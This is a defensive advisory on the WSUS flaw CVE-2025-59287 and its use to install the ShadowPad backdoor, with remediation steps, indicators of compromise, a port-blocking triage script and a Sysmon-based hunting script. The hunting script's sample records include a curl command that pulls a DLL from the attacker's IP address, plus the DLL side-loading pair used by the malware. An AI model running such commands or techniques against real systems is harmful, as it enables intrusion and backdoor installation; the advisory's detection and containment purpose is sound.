Full Report
A recently patched security flaw in Microsoft Windows Server Update Services (WSUS) has been exploited by threat actors to distribute malware known as ShadowPad. "The attacker targeted Windows Servers with WSUS enabled, exploiting CVE-2025-59287 for initial access," AhnLab Security Intelligence Center (ASEC) said in a report published last week. "They then used PowerCat, an open-source
Analysis Summary
# Vulnerability: Critical Deserialization Flaw in WSUS Leading to ShadowPad Deployment
## CVE Details
- CVE ID: CVE-2025-59287
- CVSS Score: Not stated in the source article (Microsoft's advisory rates it 9.8, CVSS v3.1); the flaw is described as **critical** and yields RCE with SYSTEM privileges.
- CWE: CWE-502, Deserialization of Untrusted Data (mapping inferred from the description; the article does not cite a CWE).
## Affected Systems
- Products: Microsoft Windows Server Update Services (WSUS)
- Versions: Not stated in the article. Treat any Windows Server running the WSUS role without the October 2025 fix as affected.
- Configurations: Windows Servers with the WSUS role enabled, in particular instances reachable from the internet on the default WSUS ports, TCP 8530 (HTTP) and 8531 (HTTPS).
## Vulnerability Description
CVE-2025-59287 is a critical deserialization vulnerability in Microsoft WSUS. Exploiting it gives an attacker Remote Code Execution with **SYSTEM privileges** on the server. In the campaign ASEC describes, that access was used to run PowerCat, an open-source netcat-style tool, to obtain a command shell, and then to install the ShadowPad backdoor.
## Exploitation
- Status: **Exploited in the wild** (Used to distribute ShadowPad malware)
- Complexity: Low (the article points to rapid weaponization once a proof of concept was public).
- Attack Vector: Network (Targeting publicly exposed WSUS instances)
## Impact
- Confidentiality: High (System access allows sensitive data disclosure)
- Integrity: High (RCE with system privileges allows full system compromise)
- Availability: High (Installation of malware like ShadowPad can lead to system disruption)
## Remediation
### Patches
- Microsoft issued the fix in October 2025 (the article, dated Nov 24, 2025, says "last month"). Install the update named in the Microsoft advisory for CVE-2025-59287 on every server with the WSUS role, and confirm the installed patch level on each server directly rather than relying on approval status shown in WSUS itself.
### Workarounds
- Until the patch is installed, take the server out of reach: block inbound TCP 8530 and 8531 (the default WSUS ports) at the host firewall, or disable the WSUS role. Either step makes WSUS non-operational for its clients, so it is containment, not a fix. Restore service only after patching and after checking the server for the indicators listed under Detection.
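The triage and containment steps above, as an added PowerShell example (not code from the ASEC report or from Microsoft). It assumes the default WSUS ports 8530/8531, an elevated session on the server itself, and the built-in `ServerManager` and `NetSecurity` cmdlets; the firewall rule name is an arbitrary label chosen here.

```powershell
# Added example: triage a Windows Server for WSUS exposure to CVE-2025-59287 and
# apply the host-firewall containment until the October 2025 update is confirmed.
# Assumes default WSUS ports (8530 HTTP, 8531 HTTPS); adjust if the role was reconfigured.

$WsusPorts = 8530, 8531

# 1. Is the WSUS role present at all? If not, this CVE does not apply to the host.
$role = Get-WindowsFeature -Name UpdateServices
if (-not $role.Installed) {
    Write-Output 'WSUS role not installed; CVE-2025-59287 does not apply to this host.'
    return
}

# 2. Which WSUS listeners are bound, and on which addresses? A LocalAddress of
#    0.0.0.0 or :: means the service answers on every interface, including any
#    internet-facing one.
Get-NetTCPConnection -State Listen |
    Where-Object { $WsusPorts -contains $_.LocalPort } |
    ForEach-Object {
        $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
        Write-Output ('WSUS listener {0}:{1} owned by {2} (PID {3})' -f
            $_.LocalAddress, $_.LocalPort, $proc.ProcessName, $_.OwningProcess)
    }

# 3. Show the most recent updates so the operator can compare against the KB named
#    in the Microsoft advisory (the KB number is deliberately not hard-coded here).
Get-HotFix | Sort-Object InstalledOn -Descending | Select-Object -First 5 HotFixID, InstalledOn

# 4. Containment: block inbound WSUS traffic at the host firewall. Windows Firewall
#    evaluates Block rules ahead of Allow rules, so this overrides the allow rules the
#    role created. WSUS clients lose access until the rule is removed after patching.
$ruleName = 'Block-WSUS-Inbound-CVE-2025-59287'   # assumed label, not a Microsoft name
if (-not (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)) {
    New-NetFirewallRule -DisplayName $ruleName -Direction Inbound -Protocol TCP `
        -LocalPort $WsusPorts -RemoteAddress Any -Action Block -Profile Any | Out-Null
    Write-Output "Inbound TCP $($WsusPorts -join ',') blocked by rule '$ruleName'."
}

# After patching and checking for the IOCs:  Remove-NetFirewallRule -DisplayName $ruleName
```

The listener check matters because a server that binds WSUS only to an internal address still needs the patch, but is not in the population the article describes as being targeted over the internet.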
## Detection
- Indicators of Compromise (IOCs):
- Execution of utilities like `curl.exe` and `certutil.exe` making external connections (e.g., to `149.28.78[.]189:42306`).
- Presence of ShadowPad components, including the use of DLL side-loading against a legitimate binary like `ETDCtrlHelper.exe` to execute the payload `ETDApix.dll`.
- Discovery of the use of the open-source utility PowerCat attempting to establish a system shell (CMD).
- Detection methods and tools: Monitor outbound traffic from WSUS servers for unexpected external connections, and alert when the WSUS service process (`WsusService.exe`) or the IIS worker process hosting the WSUS web services (`w3wp.exe`) spawns `cmd.exe`, `powershell.exe`, `curl.exe` or `certutil.exe`; legitimate WSUS operation does not produce that parent/child chain.
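The detection logic above, written out as an added PowerShell example (not from the ASEC report). It scores Sysmon-style process-create (Event ID 1), network-connect (Event ID 3) and image-load (Event ID 7) records against the three indicators on this page. The records at the bottom are constructed for the example, including their file paths; the live `Get-WinEvent` query in the trailing comment is the only part that touches real telemetry.

```powershell
# Added example: hunt for the WSUS -> PowerCat/LOLBin -> ShadowPad chain in
# Sysmon-shaped records. Field names (Image, ParentImage, CommandLine,
# DestinationIp, DestinationPort, ImageLoaded) follow Sysmon's EventData.

$IocRemote   = '149.28.78.189'                 # defanged on the page as 149.28.78[.]189
$IocPort     = 42306
$WsusParents = 'w3wp.exe', 'wsusservice.exe'   # IIS worker for the WSUS app pool; WSUS service
$LolBins     = 'cmd.exe', 'powershell.exe', 'curl.exe', 'certutil.exe'

function Find-WsusCompromise {
    param([Parameter(Mandatory)] [object[]] $Events)

    foreach ($e in $Events) {
        $image = [System.IO.Path]::GetFileName($e.Image).ToLower()
        switch ([int]$e.EventId) {
            1 {   # process create: WSUS web/service process spawning a shell or downloader
                $parent = [System.IO.Path]::GetFileName($e.ParentImage).ToLower()
                if ($WsusParents -contains $parent -and $LolBins -contains $image) {
                    [pscustomobject]@{ Rule = 'WSUS process spawned LOLBin'; Host = $e.Computer
                                       Detail = "$parent -> $image : $($e.CommandLine)" }
                }
            }
            3 {   # network connect to the staging/C2 endpoint published by ASEC
                if ($e.DestinationIp -eq $IocRemote -and [int]$e.DestinationPort -eq $IocPort) {
                    [pscustomobject]@{ Rule = 'Connection to ASEC IOC'; Host = $e.Computer
                                       Detail = "$image -> $($e.DestinationIp):$($e.DestinationPort)" }
                }
            }
            7 {   # image load: the ShadowPad side-loading pair
                $loaded = [System.IO.Path]::GetFileName($e.ImageLoaded).ToLower()
                if ($image -eq 'etdctrlhelper.exe' -and $loaded -eq 'etdapix.dll') {
                    [pscustomobject]@{ Rule = 'ShadowPad DLL side-load'; Host = $e.Computer
                                       Detail = "$($e.Image) loaded $($e.ImageLoaded)" }
                }
            }
        }
    }
}

# Constructed sample records (not real telemetry; paths are made up for the example).
$sample = @(
    [pscustomobject]@{ EventId = 1; Computer = 'WSUS01'
                       ParentImage = 'C:\Windows\System32\inetsrv\w3wp.exe'
                       Image = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'cmd.exe /c curl.exe -o C:\Users\Public\x.dll http://149.28.78.189:42306/x' }
    [pscustomobject]@{ EventId = 1; Computer = 'WSUS01'
                       ParentImage = 'C:\Windows\explorer.exe'
                       Image = 'C:\Windows\System32\notepad.exe'; CommandLine = 'notepad.exe' }
    [pscustomobject]@{ EventId = 3; Computer = 'WSUS01'
                       Image = 'C:\Windows\System32\curl.exe'
                       DestinationIp = '149.28.78.189'; DestinationPort = 42306 }
    [pscustomobject]@{ EventId = 7; Computer = 'WSUS01'
                       Image = 'C:\Users\Public\ETDCtrlHelper.exe'
                       ImageLoaded = 'C:\Users\Public\ETDApix.dll' }
)
# Three of the four sample records match; the notepad.exe record is the benign control.
Find-WsusCompromise -Events $sample | Format-Table -AutoSize

# Live use: read the Sysmon channel and map EventData to the same object shape, e.g.
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1, 3, 7 } |
#     ForEach-Object { <# build a pscustomobject from ([xml]$_.ToXml()).Event.EventData #> } |
#     Find-WsusCompromise
```

The parent/child rule is the durable one: the IP, port and side-loaded file names will change between campaigns, but a WSUS worker process launching `cmd.exe` or `certutil.exe` is anomalous regardless of what the payload is.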
## References
- Vendor Advisories: Microsoft Security Update Guide entry for CVE-2025-59287 (fix released October 2025).
- Relevant links - defanged:
- AhnLab Security Intelligence Center Report: asec dot ahnlab dot com/en/91166/
- The Hacker News Article: thehackernews dot com/2025/11/shadowpad-malware-actively-exploits.html